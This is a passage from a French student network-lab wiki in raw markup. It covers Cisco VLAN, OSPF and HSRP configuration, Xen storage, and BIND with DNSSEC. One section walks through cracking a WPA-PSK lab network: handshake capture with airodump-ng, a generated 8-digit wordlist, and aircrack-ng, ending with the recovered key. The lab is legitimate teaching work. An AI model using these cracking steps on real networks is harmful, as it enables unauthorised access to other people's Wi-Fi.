*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.space &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
Un bon moyen de contrôler le déploiement de nos clefs : [http://dnsviz.net/]&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
